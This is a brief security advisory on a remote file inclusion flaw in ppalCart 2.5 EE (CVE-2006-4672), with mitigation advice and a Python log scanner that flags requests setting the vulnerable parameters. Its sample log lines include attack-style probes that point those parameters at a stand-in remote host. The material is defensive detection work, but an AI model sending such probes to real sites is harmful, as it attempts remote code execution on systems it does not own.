ppalCart · CVE-2006-4672
**Name of the Vulnerable Software and Affected Versions**
ppalCart version 2.5 EE
**Description**
A remote file inclusion issue allows attackers to execute arbitrary PHP code. This can be achieved by providing a URL in the `proMod` parameter to "index.php", or the `docroot` parameter to "index.php" or "mainpage.php".
**Recommendations**
For ppalCart version 2.5 EE, consider blocking requests that supply the `proMod` or `docroot` parameters to the affected scripts "index.php" and "mainpage.php" until a patch is available. Restrict access to these scripts to minimize the risk of exploitation.
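
To check whether the affected parameters are being probed, web server access logs can be scanned for requests that set them. The following is an added detection example, not code from the advisory or from ppalCart; the log format (combined), the `/shop/` path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script name -> parameters the advisory names for that script.
AFFECTED = {"index.php": {"proMod", "docroot"}, "mainpage.php": {"docroot"}}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value begins with scheme:// or a scheme-relative //host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)

def classify(line):
    """Return (script, param, verdict) if the request sets an affected parameter, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    script = unquote(parts.path).rsplit("/", 1)[-1]
    hit = None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in AFFECTED.get(script, ()):
            continue
        # parse_qsl decoded once; decode again to catch double-encoded values.
        if REMOTE_RE.match(unquote(value)):
            return script, name, "remote-url"
        hit = hit or (script, name, "param-present")
    return hit

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE = [
    '198.51.100.7 - - [12/Sep/2006:10:01:22 +0000] "GET /shop/index.php?proMod=http%3A%2F%2Fhost.example.invalid%2F HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Sep/2006:10:01:25 +0000] "GET /shop/mainpage.php?docroot=%2568ttp://host.example.invalid/ HTTP/1.1" 200 498',
    '203.0.113.4 - - [12/Sep/2006:10:02:00 +0000] "GET /shop/index.php?page=cart HTTP/1.1" 200 2048',
    '203.0.113.4 - - [12/Sep/2006:10:02:09 +0000] "GET /shop/mainpage.php?proMod=http://host.example.invalid/ HTTP/1.1" 200 2048',
    '203.0.113.9 - - [12/Sep/2006:10:03:41 +0000] "GET /shop/index.php?docroot=includes/ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        result = classify(entry)
        if result:
            print(result, "<-", entry.split('"')[1])
```

Access logs normally record only the query string, so parameters sent in a POST body are not visible to this check.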